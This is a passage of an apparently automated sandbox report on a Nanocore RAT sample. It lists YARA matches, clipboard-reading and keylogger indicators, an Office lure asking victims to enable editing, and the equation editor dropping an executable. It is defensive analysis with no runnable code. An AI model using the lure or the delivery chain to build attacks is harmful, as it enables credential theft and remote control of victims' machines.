Code function: 5_2_0100A0FC OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_0100A0FC

Contains functionality to read the clipboard data

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

5_2_0101D91D

Installs a raw input device (often for capturing keystrokes)

Source: RegSvcs.exe, 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

Potential key logger detected (key state polling based)

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

5_2_0102C7D6

E-Banking Fraud:

Yara detected Nanocore RAT

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: enable Editing and Content from the Yellow bar 18 above to view locked content. 19 20 21 22

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe			Jump to dropped file

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027626D	4_2_0027626D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002683C0	4_2_002683C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0028C0B0	4_2_0028C0B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002630FC	4_2_002630FC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00280113	4_2_00280113
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027F3CA	4_2_0027F3CA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002733D3	4_2_002733D3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026E510	4_2_0026E510
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00280548	4_2_00280548
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0028C55E	4_2_0028C55E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026F5C5	4_2_0026F5C5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027364E	4_2_0027364E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00290654	4_2_00290654
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002766A2	4_2_002766A2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00262692	4_2_00262692
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027589E	4_2_0027589E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027F8C6	4_2_0027F8C6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026E973	4_2_0026E973
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027397F	4_2_0027397F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026BAD1	4_2_0026BAD1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026DADD	4_2_0026DADD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00283CBA	4_2_00283CBA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027FCDE	4_2_0027FCDE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00276CDB	4_2_00276CDB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00265D7E	4_2_00265D7E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00263EAD	4_2_00263EAD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00283EE9	4_2_00283EE9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026DF12	4_2_0026DF12
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FB35F0	5_2_00FB35F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FB98F0	5_2_00FB98F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC2136	5_2_00FC2136
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCA137	5_2_00FCA137
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD427D	5_2_00FD427D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFF3A6	5_2_00FFF3A6
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FB98F0	5_2_00FB98F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF655F	5_2_00FF655F
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC2508	5_2_00FC2508
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FBF730	5_2_00FBF730
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC3721	5_2_00FC3721
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC28F0	5_2_00FC28F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCC8CE	5_2_00FCC8CE
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD088F	5_2_00FD088F
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC1903	5_2_00FC1903
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFEAD5	5_2_00FFEAD5
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0102EA2B	5_2_0102EA2B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD3BA1	5_2_00FD3BA1
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD0DE0	5_2_00FD0DE0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC1D98	5_2_00FC1D98
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF2D2D	5_2_00FF2D2D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF4EB7	5_2_00FF4EB7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFCE8D	5_2_00FFCE8D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD1F2C	5_2_00FD1F2C
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_009243A0	6_2_009243A0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092B310	6_2_0092B310
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092DEB8	6_2_0092DEB8
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_00923788	6_2_00923788
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092BF28	6_2_0092BF28
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092C800	6_2_0092C800
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_00924458	6_2_00924458
